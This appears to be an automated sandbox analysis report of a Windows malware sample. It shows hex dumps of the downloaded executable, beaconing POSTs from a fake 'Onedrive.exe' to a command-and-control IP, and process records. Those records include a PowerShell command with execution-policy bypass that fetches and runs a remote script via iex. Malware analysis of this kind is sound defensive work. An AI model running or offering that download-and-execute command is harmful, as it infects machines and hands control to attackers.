                                                  2024-12-19 12:35:15 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3e 87 d9 e0 7a e6 b7 b3 7a e6 b7 b3 7a e6 b7 b3 31 9e b4 b2 7d e6 b7 b3 31 9e b2 b2 f6 e6 b7 b3 31 9e b3 b2 70 e6 b7 b3 6a 62 b4 b2 73 e6 b7 b3 6a 62 b3 b2 74 e6 b7 b3 6a 62 b2 b2 5a e6 b7 b3 31 9e b6 b2 79 e6 b7 b3 7a e6 b6 b3 12 e6 b7 b3 31 63 b3 b2 79 e6 b7 b3 31 63 b7 b2 7b e6 b7 b3 31 63 48 b3 7b e6 b7 b3 31 63 b5 b2 7b e6 b7 b3 52 69 63 68 7a e6 b7 b3 00 00 00 00 00 00 00
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$>zzz1}11pjbsjbtjbZ1yz1cy1c{1cH{1c{Richz
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 56 57 48 81 ec e8 00 00 00 48 8b 05 1c 34 05 00 48 33 c4 48 89 84 24 d0 00 00 00 48 8d 44 24 30 48 8d 0d 45 e6 03 00 48 8b f8 48 8b f1 b9 98 00 00 00 f3 a4 b8 08 00 00 00 48 6b c0 00 48 8d 0d 78 2a 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 01 48 8b 8c 24 18 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 02 48 8b 8c 24 20 01 00 00 48 89 4c 04 50 48 63 84 24 30 01 00 00 b9 08 00 00 00 48 6b c9 03 48 89 44 0c 50 b8 08 00 00 00 48 6b c0 04 48 8b 8c 24 10 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 05 48 8b 8c 24 28 01 00 00 48 89 4c 04 50 b8 08 00 00 00 48 6b c0 06 48 8b 8c 24 08 01 00 00 48 89 4c 04 50 0f b6 84 24 50 01 00 00 b9 08 00 00 00 48 6b c9 07 48 89 44 0c 50 b8 08 00 00 00 48 6b c0
                                                  Data Ascii: LL$ LD$HT$HL$VWHH4H3H$HD$0HEHHHkHx*HLPHkH$HLPHkH$ HLPHc$0HkHDPHkH$HLPHkH$(HLPHkH$HLP$PHkHDPHk
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 48 48 8d 44 24 28 48 89 44 24 20 4c 8b 44 24 60 48 8b 54 24 58 48 8b 4c 24 20 e8 5a 25 00 00 41 b1 01 44 8b 44 24 68 48 8b d0 48 8b 4c 24 50 e8 05 2a 00 00 48 83 c4 48 c3 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec 98 00 00 00 48 c7 44 24 60 fe ff ff ff 48 83 bc 24 a8 00 00 00 00 74 0a c7 44 24 30 01 00 00 00 eb 08 c7 44 24 30 00 00 00 00 8b 44 24 30 89 44 24 34 83 7c 24 34 00 75 3a 48 8d 05 d1 b0 03 00 48 89 44 24 28 48 8d 05 15 a7 03 00 48 89 44 24 20 45 33 c9 41 b8 22 00 00 00 48 8d 15 d8 b0 03 00 b9 02 00 00 00 e8 ee 62 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 34 00 75 61 48 8b 8c 24 b8 00 00 00 e8 72 7a 00 00 48 89 44 24 40 ba 16 00 00 00 48 8b 4c 24 40 e8 be
                                                  Data Ascii: DL$ LD$HT$HL$HHHD$(HD$ LD$`HT$XHL$ Z%ADD$hHHL$P*HHLL$ LD$HT$HL$HHD$`H$tD$0D$0D$0D$4|$4u:HHD$(HHD$ E3A"Hbu3|$4uaH$rzHD$@HL$@
                                                  2024-12-19 12:35:15 UTC15581INData Raw: 24 38 48 8b 8c 24 90 00 00 00 e8 91 e2 ff ff 88 44 24 33 eb 16 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 a9 e2 ff ff 88 44 24 33 0f b6 44 24 33 88 44 24 30 e9 23 01 00 00 ba 10 00 00 00 48 8b 8c 24 90 00 00 00 e8 a5 3b 00 00 0f b6 c0 85 c0 74 18 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 9c e2 ff ff 88 44 24 34 eb 16 48 8d 54 24 38 48 8b 8c 24 90 00 00 00 e8 84 e2 ff ff 88 44 24 34 0f b6 44 24 34 88 44 24 30 e9 ce 00 00 00 33 c0 85 c0 74 0a c7 44 24 40 01 00 00 00 eb 08 c7 44 24 40 00 00 00 00 8b 44 24 40 89 44 24 44 83 7c 24 44 00 75 3a 48 8d 05 54 7c 03 00 48 89 44 24 28 48 8d 05 00 67 03 00 48 89 44 24 20 45 33 c9 41 b8 0b 0a 00 00 48 8d 15 f3 72 03 00 b9 02 00 00 00 e8 d9 22 01 00 83 f8 01 75 03 cc 33 c0 83 7c 24 44 00 75 66 48 8b 84 24 90 00 00 00 48
                                                  Data Ascii: $8H$D$3HT$8H$D$3D$3D$0#H$;tHT$8H$D$4HT$8H$D$4D$4D$03tD$@D$@D$@D$D|$Du:HT|HD$(HgHD$ E3AHr"u3|$DufH$H
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 57 eb 23 0f be 44 24 08 83 f8 41 7c 14 0f be 44 24 08 83 f8 5a 7f 0a 0f be 44 24 08 83 e8 37 eb 05 b8 ff ff ff ff c3 cc cc cc cc cc cc cc cc cc cc cc cc 66 89 4c 24 08 48 83 ec 38 0f b7 4c 24 40 e8 0d 5f 00 00 89 44 24 20 83 7c 24 20 ff 74 06 8b 44 24 20 eb 26 0f b7 44 24 40 8b c8 e8 40 6f 00 00 85 c0 74 11 0f b7 44 24 40 8b c8 e8 90 6f 00 00 83 e8 37 eb 05 b8 ff ff ff ff 48 83 c4 38 c3 cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 68 48 8b 44 24 70 48 8b 48 08 e8 e4 fd ff ff 48 89 44 24 30 48 8d 54 24 40 48 8b 4c 24 30 e8 20 f8 ff ff 48 c7 44 24 28 00 00 00 00 48 8b 44 24 70 48 8b 40 10 48 ff c8 41 b9 0a 00 00 00 4c 8d 44 24 28 48 8b d0 48 8b 44 24 70 48 8b 48 08 e8 ef 81 ff ff 48 8b 4c 24 78 89 01 48 8b 44 24 70 48 8b 48 08 e8 8a fd ff ff 48 89 44 24 38 ba
                                                  Data Ascii: W#D$A|D$ZD$7fL$H8L$@_D$ |$ tD$ &D$@@otD$@o7H8HT$HL$HhHD$pHHHD$0HT$@HL$0 HD$(HD$pH@HALD$(HHD$pHHHL$xHD$pHHHD$8
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 0f b7 40 3a 83 f8 67 74 11 48 8b 84 24 d0 00 00 00 0f b7 40 3a 83 f8 47 75 0f 48 8b 84 24 d0 00 00 00 c7 40 30 01 00 00 00 48 8b 84 24 d0 00 00 00 48 83 c0 50 48 89 44 24 60 48 8b 84 24 d0 00 00 00 8b 40 30 05 5d 01 00 00 48 98 48 8b 8c 24 d0 00 00 00 4c 8b 41 08 48 8b d0 48 8b 4c 24 60 e8 ae 61 ff ff 0f b6 c0 85 c0 75 25 48 8b 84 24 d0 00 00 00 48 83 c0 50 48 8b c8 e8 a3 60 ff ff 48 2d 5d 01 00 00 48 8b 8c 24 d0 00 00 00 89 41 30 48 8b 84 24 d0 00 00 00 48 83 c0 50 48 8b c8 e8 1e 61 ff ff 48 8b 8c 24 d0 00 00 00 48 89 41 40 48 8d 44 24 58 48 8b f8 33 c0 b9 08 00 00 00 f3 aa 48 8d 54 24 58 48 8b 8c 24 d0 00 00 00 e8 7f 65 ff ff 0f b6 c0 85 c0 75 07 32 c0 e9 bd 02 00 00 48 8b 84 24 d0 00 00 00 48 8b 40 08 48 89 44 24 68 48 8b 84 24 d0 00 00 00 48 8b 00 48
                                                  Data Ascii: @:gtH$@:GuH$@0H$HPHD$`H$@0]HH$LAHHL$`au%H$HPH`H-]H$A0H$HPHaH$HA@HD$XH3HT$XH$eu2H$H@HD$hH$HH
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 74 25 b8 01 00 00 00 48 6b c0 00 48 8b 4c 24 70 0f be 04 01 85 c0 74 0f 48 8b 44 24 70 48 89 84 24 80 00 00 00 eb 0f 48 8d 05 e5 2f 04 00 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 48 89 84 24 88 00 00 00 48 c7 44 24 48 00 00 00 00 48 c7 44 24 78 00 00 00 00 48 8d 44 24 78 48 89 44 24 20 4c 8d 4c 24 48 45 33 c0 33 d2 48 8b 8c 24 88 00 00 00 e8 0a 02 00 00 41 b8 01 00 00 00 48 8b 54 24 78 48 8b 4c 24 48 e8 f5 07 00 00 48 8b d0 48 8d 4c 24 30 e8 f8 af fe ff 48 8d 4c 24 30 e8 2e b0 fe ff 0f b6 c0 85 c0 75 26 e8 22 6b 00 00 c7 00 0c 00 00 00 c7 44 24 5c 0c 00 00 00 48 8d 4c 24 30 e8 4a fc fe ff 8b 44 24 5c e9 67 01 00 00 48 8d 4c 24 30 e8 37 b0 fe ff 48 89 84 24 90 00 00 00 48 8d 4c 24 30 e8 25 b0 fe ff 48 8b 4c 24 48 48 8d 04 c8 48 89 84 24 a8 00 00 00
                                                  Data Ascii: t%HkHL$ptHD$pH$H/H$H$H$HD$HHD$xHD$xHD$ LL$HE33H$AHT$xHL$HHHL$0HL$0.u&"kD$\HL$0JD$\gHL$07H$HL$0%HL$HHH$
                                                  2024-12-19 12:35:15 UTC16384INData Raw: e8 8e 68 fe ff 48 81 c4 b8 00 00 00 c3 cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 48 83 7c 24 40 00 75 04 33 c0 eb 2d 48 8b 4c 24 40 e8 e1 eb ff ff 48 89 44 24 20 48 8b 05 f5 f9 03 00 48 89 44 24 28 4c 8b 44 24 20 33 d2 48 8b 4c 24 28 ff 15 7e 58 02 00 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc 44 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 18 48 83 7c 24 20 00 74 09 c7 04 24 01 00 00 00 eb 07 c7 04 24 00 00 00 00 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 68 48 83 7c 24 70 00 74 0a c7 44 24 44 01 00 00 00 eb 08 c7 44 24 44 00 00 00 00 8b 44 24 44 89 44 24 48 83 7c 24 48 00 75 3a 48 8d 05 2f b3 02 00 48 89 44 24 28 48 8d 05 03 6a 02 00 48 89 44 24 20 45 33 c9 41 b8 e4 05 00 00 48 8d 15 06 a6 02 00 b9 02
                                                  Data Ascii: hHHL$H8H|$@u3-HL$@HD$ HHD$(LD$ 3HL$(~XH8DD$T$HL$HH|$ t$$$HHL$HhH|$ptD$DD$DD$DD$H|$Hu:H/HD$(HjHD$ E3AH
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 54 24 20 48 8d 4c 24 38 e8 c6 78 ff ff 48 8b d0 b9 08 00 00 00 e8 09 fc ff ff 0f b6 44 24 60 85 c0 74 0a 8b 44 24 20 89 44 24 28 eb 08 8b 44 24 24 89 44 24 28 8b 44 24 28 48 83 c4 58 c3 cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8d 4c 24 40 e8 c8 30 fe ff 0f b6 c0 85 c0 75 04 32 c0 eb 48 48 8d 4c 24 40 e8 23 fe fe ff 89 44 24 20 8b 4c 24 20 e8 76 00 00 00 0f b6 c0 85 c0 75 04 32 c0 eb 26 8b 4c 24 20 e8 c2 00 00 00 0f b6 c0 85 c0 75 14 48 8b 44 24 48 8b 00 ff c0 48 8b 4c 24 48 89 01 32 c0 eb 02 b0 01 48 83 c4 38 c3 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 e8 c9 fd fe ff 23 44 24 48 3b 44 24 48 75 0a c7 44 24 20 01 00 00 00 eb 08 c7 44 24 20 00 00 00 00 0f b6 44 24 20 48 83 c4 38 c3 cc cc cc 89 4c 24 08 48 83 ec 18 8b 44 24 20
                                                  Data Ascii: T$ HL$8xHD$`tD$ D$(D$$D$(D$(HXHT$HL$H8HL$@0u2HHL$@#D$ L$ vu2&L$ uHD$HHL$H2H8T$HL$H8HL$@#D$H;D$HuD$ D$ D$ H8L$HD$
                                                  2024-12-19 12:35:15 UTC16384INData Raw: 00 00 48 8b 84 24 08 01 00 00 48 89 44 24 38 8b 84 24 00 01 00 00 89 44 24 30 8b 84 24 f0 00 00 00 89 44 24 28 48 8b 84 24 e0 00 00 00 48 89 44 24 20 4c 8b 8c 24 d8 00 00 00 4c 8b 84 24 d0 00 00 00 48 8b 94 24 c8 00 00 00 48 8b 8c 24 c0 00 00 00 e8 fc f0 ff ff e9 a6 00 00 00 33 c0 85 c0 75 3a 48 8d 05 aa 4d 02 00 48 89 44 24 28 48 8d 05 76 ea 01 00 48 89 44 24 20 45 33 c9 41 b8 4c 03 00 00 48 8d 15 89 48 02 00 b9 02 00 00 00 e8 4f a6 ff ff 83 f8 01 75 03 cc 33 c0 48 8b 84 24 08 01 00 00 48 89 44 24 48 8b 84 24 00 01 00 00 89 44 24 40 8b 44 24 58 89 44 24 38 0f b6 44 24 50 88 44 24 30 8b 84 24 f0 00 00 00 89 44 24 28 48 8b 84 24 e0 00 00 00 48 89 44 24 20 4c 8b 8c 24 d8 00 00 00 4c 8b 84 24 d0 00 00 00 48 8b 94 24 c8 00 00 00 48 8b 8c 24 c0 00 00 00 e8 21
                                                  Data Ascii: H$HD$8$D$0$D$(H$HD$ L$L$H$H$3u:HMHD$(HvHD$ E3ALHHOu3H$HD$H$D$@D$XD$8D$PD$0$D$(H$HD$ L$L$H$H$!


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.44973547.84.196.1484438020C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:35:18 UTC179OUTPOST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 279
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:35:18 UTC279OUTData Raw: 00 00 01 13 de ad be ef 34 14 9c 50 00 00 00 63 00 00 00 00 b6 d0 4a 3c 32 82 6a 94 78 92 e0 4a 52 26 2a d0 1e 4a 9a 1a 5a 5e e6 30 a2 12 e4 14 e2 06 80 12 a4 f0 cc 1a f2 1a b8 d0 82 e0 70 24 28 ba 42 1c e1 cd 69 ff d4 81 08 c7 7b d3 b6 a1 42 69 d4 d5 0a e6 9b 46 3d d6 2f 3b a6 d4 9c a9 cd 9a 2b f7 5e fe 2d 66 95 39 b9 cc 5f 48 2f 9f 1e 50 12 c2 fd 67 0d 18 83 41 df 25 21 03 84 96 e6 99 6f 60 30 69 db 28 79 e2 5f db df fa e7 c1 70 5a 53 2b 7e 32 98 e1 af 16 bd e3 9a 15 80 82 16 15 99 dd 29 2b 42 5a f2 0e af d9 49 ee a4 49 a5 53 73 bc df e1 ef 7e 55 1c da 6c ac 62 d0 ce 47 7d f5 16 d8 53 b9 b5 08 47 b5 a4 05 89 36 88 39 46 a4 fd e6 f5 de 00 20 59 77 8f b3 4d 3c a6 56 7e 7b 15 57 a5 0c f8 c5 1a ec 36 97 bd 45 24 bf 86 69 49 ee 96 6b fe 8f 48 c1 44 00 1a e1
                                                  Data Ascii: 4PcJ<2jxJR&*JZ^0p$(Bi{BiF=/;+^-f9_H/PgA%!o`0i(y_pZS+~2)+BZIISs~UlbG}SG69F YwM<V~{W6E$iIkHD
                                                  2024-12-19 12:35:19 UTC167INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:35:19 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 4
                                                  Content-Type: text/plain; charset=utf-8
                                                  Connection: close
                                                  2024-12-19 12:35:19 UTC4INData Raw: 85 45 e1 9b
                                                  Data Ascii: E


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.44974247.84.196.1484438020C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:35:46 UTC178OUTPOST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:35:46 UTC20OUTData Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:35:47 UTC167INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:35:47 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:35:47 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.44978547.84.196.1484438020C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:36:18 UTC178OUTPOST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:36:18 UTC20OUTData Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:36:19 UTC167INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:36:19 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:36:19 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.44986447.84.196.1484438020C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:36:53 UTC178OUTPOST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:36:53 UTC20OUTData Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:36:54 UTC167INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:36:54 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:36:54 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.44992747.84.196.1484438020C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:37:21 UTC178OUTPOST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:37:21 UTC20OUTData Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:37:22 UTC167INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:37:22 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:37:22 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.44998547.84.196.1484438020C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:37:46 UTC178OUTPOST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:37:46 UTC20OUTData Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:37:47 UTC167INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:37:47 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:37:47 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.45001347.84.196.1484438020C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:38:12 UTC178OUTPOST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:38:12 UTC20OUTData Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:38:13 UTC167INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:38:12 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:38:13 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.45001447.84.196.1484438020C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-19 12:38:44 UTC178OUTPOST /reports HTTP/1.1
                                                  Cache-Control: no-cache
                                                  Connection: Keep-Alive
                                                  Pragma: no-cache
                                                  Content-Type: */*
                                                  User-Agent: Mozilla/5.0
                                                  Content-Length: 20
                                                  Host: 47.84.196.148
                                                  2024-12-19 12:38:44 UTC20OUTData Raw: 00 00 00 10 de ad be ef 34 14 9c 50 00 00 00 01 00 00 00 00
                                                  Data Ascii: 4P
                                                  2024-12-19 12:38:45 UTC167INHTTP/1.1 200 OK
                                                  Date: Thu, 19 Dec 2024 12:38:45 GMT
                                                  Server: Apache/2.4.58 (Ubuntu)
                                                  Content-Length: 12
                                                  Content-Type: application/octet-stream
                                                  Connection: close
                                                  2024-12-19 12:38:45 UTC12INData Raw: 0a 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:07:35:00
                                                  Start date:19/12/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /min powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
                                                  Imagebase:0x7ff6b9c00000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:07:35:00
                                                  Start date:19/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:07:35:00
                                                  Start date:19/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-RestMethod -Uri 'bangla.b-cdn.net/g1.ps1' | iex}"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:07:35:00
                                                  Start date:19/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:07:35:15
                                                  Start date:19/12/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\Onedrive.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Onedrive.exe"
                                                  Imagebase:0x7ff63ea10000
                                                  File size:110'536 bytes
                                                  MD5 hash:32C31F06E0B68F349F68AFDD08E45F3D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 0%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FFD9B8A66CC Relevance: .6, Instructions: 572COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1860113660.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 482840bc5f1a3078e1294c59af60099da02e7692e000dbde6a3e4d00950ae3b5
                                                    • Instruction ID: 2dea30849a461de71e5d4a03d7beaa9a59e87b587be8e542bf430c1c84aea52a
                                                    • Opcode Fuzzy Hash: 482840bc5f1a3078e1294c59af60099da02e7692e000dbde6a3e4d00950ae3b5
                                                    • Instruction Fuzzy Hash: 13026B60B0E68A0FF369A7B884756B977D1EF49304F1900BAD49DC72EBDD1DB8428352
                                                    Function 00007FFD9B8A3605 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1860113660.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                    • Instruction ID: 6d0e875e3487154e16ef2ed8281ff20f1ac93b1af21c7f695f13a3f35984f2f3
                                                    • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                    • Instruction Fuzzy Hash: 2301677121CB0C4FD748EF4CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                    Function 00007FFD9B8A4CB8 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1860113660.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
